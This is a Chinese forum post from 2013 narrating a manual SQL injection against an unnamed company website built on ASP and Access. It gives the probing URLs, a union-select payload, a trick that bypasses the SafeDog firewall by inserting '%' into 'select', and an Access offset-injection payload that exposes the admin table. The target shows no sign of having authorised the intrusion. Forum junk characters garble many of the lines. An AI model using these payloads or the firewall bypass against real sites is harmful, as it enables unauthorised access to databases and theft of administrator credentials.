找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1958|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。2 t3 L5 D- Z& j2 c3 B0 M
% z+ i* V; X8 A8 P
7 c# i. O2 p6 G3 Y6 `  y
顺手加个admin; o  E+ |1 d. b+ t
; U( o2 y" Y+ q# A2 J  k( K

, l) \9 S# z4 x5 e) |: p默认后台。
6 z$ Q, h0 f0 X1 b# y回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​) V! A# \1 L9 v6 w4 B6 r; x' k) J
: @6 h2 ^, Z3 w1 L3 N
0 I0 \$ A: @3 h. M

  J' ]; e. f: u# w/ @8 N: m所以就不用御剑扫了,待会直接封IP。
5 P4 {" e! u' Y8 p6 @ $ |3 b- |/ v0 f- w" N, B  x
用order by语句判断是否存在注入。& L8 S3 S# q% c! j
http://www.xxx.com /product_show.asp?id=997 order by 1
. M! _) u0 t6 U/ L* P9 Mhttp://www.xxx.com /product_show.asp?id=997 order by 100
: `" i# L& ?' N9 [; k5 ?现在存在注入,经测试后发现是9个字段。
5 _# [+ y+ R' b * J" j$ L' I. u" O' W
接下来进行联合查询,猜是否存在admin表。
; }5 }0 \# i9 T  P* t1 {8 _7 m, ?http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​0 \8 p" E1 `# R7 q2 X2 `

7 }2 p( b( W" {" A/ C/ }! h& E) \( K! Y4 H
& Z" j4 o4 C9 Z4 V) [
在select中间加个%,se%lect绕过安全狗。& x* V- x0 Y! u
. z5 N: [$ j3 ~
& ]- l! [: e2 {0 M! c
发现存在admin表,然后开始手工猜常用的字段。4 l% L7 {# q0 w0 `$ W: ^! B
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
" m; f5 V) t; `4 i& ~ 3 Y' Y5 B/ ?- m7 j' v9 S' }3 e/ J, _* {
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
5 Y0 U  s1 D) c  I" f' K
* ~' U: g  [# H# Q1 k科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
8 x) b  v8 p4 ^http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin- I' M" a1 @$ `6 a) g7 P# X3 C- s
好了,敏感内容出显了。​9 y* a3 @4 I3 [* S

3 `. J4 }9 K  m% [: x- b7 @. t" I

& `; Q2 w9 r/ ]  a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表